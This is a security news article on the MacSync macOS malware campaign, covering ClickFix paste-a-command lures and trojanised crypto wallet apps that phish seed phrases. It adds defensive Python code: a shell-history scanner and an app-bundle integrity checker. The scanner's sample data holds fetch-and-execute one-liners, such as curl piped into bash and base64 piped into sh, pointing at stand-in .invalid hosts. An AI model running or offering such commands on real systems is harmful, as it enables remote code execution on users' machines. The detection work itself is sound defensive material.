
A new malware campaign has emerged in the macOS world, one that relies not on sophisticated exploits but on good old-fashioned social engineering. It is powered by the MacSync malware, distributed under the “malware-as-a-service” model: a low-cost offering that puts the tooling within reach of even inexperienced but highly active attackers.
MacSync masquerades as a cloud storage installer and is distributed via websites that appear almost indistinguishable from legitimate download portals.
In one case documented by CloudSEK specialists, the user was first redirected from a page simulating a Microsoft account login form and then to the “official” macOS app website.
There, no suspicious files were offered. Instead, the visitor was shown an error message and advised to use an “advanced installation method” via Terminal. What followed was a classic ClickFix scheme. The user was literally tricked into copying and pasting a single command line, supposedly required to complete the installation or fix a problem.
The command appeared harmless, but it actually downloaded and executed a remote malicious script. Because the user ran the command themselves, macOS saw nothing suspicious: Gatekeeper, signature verification, and the other protections that guard downloaded applications were simply sidestepped.
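The defensive counterpart to the ClickFix step described above is to look for the shape of the pasted command rather than for any specific domain or script. The following is an added example, not code from the original article or from CloudSEK: a small Python scanner that runs a few heuristics over shell history or command-audit lines and flags one-liners that download and execute remote content in a single step. The sample history, rule names and `.invalid` domains are constructed for the demonstration.

```python
import re
from dataclasses import dataclass

DOWNLOADERS = r"(?:curl|wget)\b"
SHELLS = r"(?:sh|bash|zsh)\b"

# Each rule is (human-readable reason, compiled pattern). The patterns target the
# "fetch and run in one line" idiom that a ClickFix paste relies on.
RULES = [
    ("remote script piped into a shell",
     re.compile(rf"{DOWNLOADERS}[^|]*\|\s*(?:sudo\s+)?{SHELLS}")),
    ("remote script executed via command substitution",
     re.compile(rf"{SHELLS}\s+-c\s+[\"']?\$\(\s*{DOWNLOADERS}")),
    ("base64-decoded payload piped into a shell",
     re.compile(rf"base64\s+(?:-d|-D|--decode)[^|]*\|\s*(?:sudo\s+)?{SHELLS}")),
    ("download of a hidden or temp-path binary",
     re.compile(rf"{DOWNLOADERS}[^|;&]*(?:/tmp/|/private/tmp/|\$TMPDIR)")),
]


@dataclass
class Finding:
    command: str
    reasons: list


def inspect_command(cmd: str) -> list:
    """Return the names of every rule the command trips (empty list if none)."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_history(lines) -> list:
    """Run inspect_command over each non-empty line and collect the hits."""
    findings = []
    for raw in lines:
        cmd = raw.strip()
        if not cmd:
            continue
        reasons = inspect_command(cmd)
        if reasons:
            findings.append(Finding(cmd, reasons))
    return findings


# Constructed sample history: three ordinary commands, then four lines shaped like
# a ClickFix paste. Domains use the reserved .invalid TLD and resolve nowhere.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git status",
    "curl -sSL https://docs.example.invalid/readme.txt -o readme.txt",
    "curl -fsSL https://cdn.example.invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://cdn.example.invalid/setup.sh)"',
    'echo "ZWNobyBoaQo=" | base64 -d | sh',
    "curl -s https://cdn.example.invalid/agent -o /tmp/.agent && chmod +x /tmp/.agent",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"{', '.join(f.reasons)}\n    {f.command}")
```

The heuristics are deliberately narrow: a plain `curl -o file` download is not flagged, only the combination of fetching and executing. In an EDR or osquery deployment the same patterns would be applied to process-execution events for `Terminal`-spawned shells rather than to history files, which a user (or the script itself) can clear.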
Once installed, MacSync takes a long time to reveal itself. The malware operates silently, relying on long-term persistence on the system. One of its main functions is to replace popular Electron-based companion applications for cryptocurrency hardware wallets, including Ledger Live and Trezor Suite, with modified copies.
The modified versions appear legitimate, but when the time comes they begin showing the user “service” screens that report errors and prompt them to restore their account. This can happen even several weeks after infection.
The user is prompted to enter a PIN and a seed phrase, supposedly to resolve the issue; at that point the attackers gain complete control of the victim’s cryptocurrency. In effect, a trusted app is turned into a sophisticated phishing tool.
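Because the swapped wallet apps look and behave normally until they are triggered, the practical detection is file integrity rather than user observation. On macOS the first check is the native one, `codesign --verify --deep --strict` against the installed bundle, since a replaced or patched Electron payload breaks the signature. The block below is an added, portable illustration of the same idea (not code from the article, CloudSEK, Ledger or Trezor): it hashes every file in an application bundle into a baseline manifest and reports what was added, removed or modified when the bundle is re-hashed later. The bundle layout and file contents in `demo()` are stand-ins built in a temporary directory.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large app.asar archives do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(bundle: Path) -> dict:
    """Map every regular file under the bundle (relative POSIX path) to its SHA-256."""
    return {
        p.relative_to(bundle).as_posix(): sha256_of(p)
        for p in sorted(bundle.rglob("*"))
        if p.is_file()
    }


def compare_manifests(baseline: dict, current: dict) -> dict:
    """Report drift between a trusted baseline and a fresh scan of the same bundle."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            k for k in baseline.keys() & current.keys() if baseline[k] != current[k]
        ),
    }


def _write(bundle: Path, rel: str, data: bytes) -> None:
    p = bundle / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_bytes(data)


def demo() -> dict:
    """Build a stand-in Electron bundle, baseline it, tamper with it, and return the drift."""
    with tempfile.TemporaryDirectory() as tmp:
        bundle = Path(tmp) / "WalletApp.app"  # hypothetical bundle name
        _write(bundle, "Contents/Info.plist", b"<plist/>")
        _write(bundle, "Contents/MacOS/WalletApp", b"stand-in main binary")
        _write(bundle, "Contents/Resources/app.asar", b"ASAR stand-in: original renderer code")
        baseline = build_manifest(bundle)

        # Simulate the substitution the article describes: the packaged JavaScript
        # is replaced by a version that later shows a fake "restore your account"
        # screen, and an extra helper file is dropped alongside it.
        _write(bundle, "Contents/Resources/app.asar",
               b"ASAR stand-in: renderer with injected recovery prompt")
        _write(bundle, "Contents/Resources/helper.js", b"// injected file")
        return compare_manifests(baseline, build_manifest(bundle))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The baseline must be captured from a known-good install (for example immediately after a download verified against the vendor's published checksum) and stored somewhere the malware cannot rewrite, such as a managed-device inventory; a manifest kept next to the bundle would simply be regenerated along with the tampered files.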
Despite its status as a “low-cost MaaS solution,” MacSync’s potential appears to be quite serious. The malware can collect browser data, crypto wallet information, keychain contents, and files.
This makes it dangerous not only for private users, but also for corporate devices, where macOS is increasingly used as a work platform.
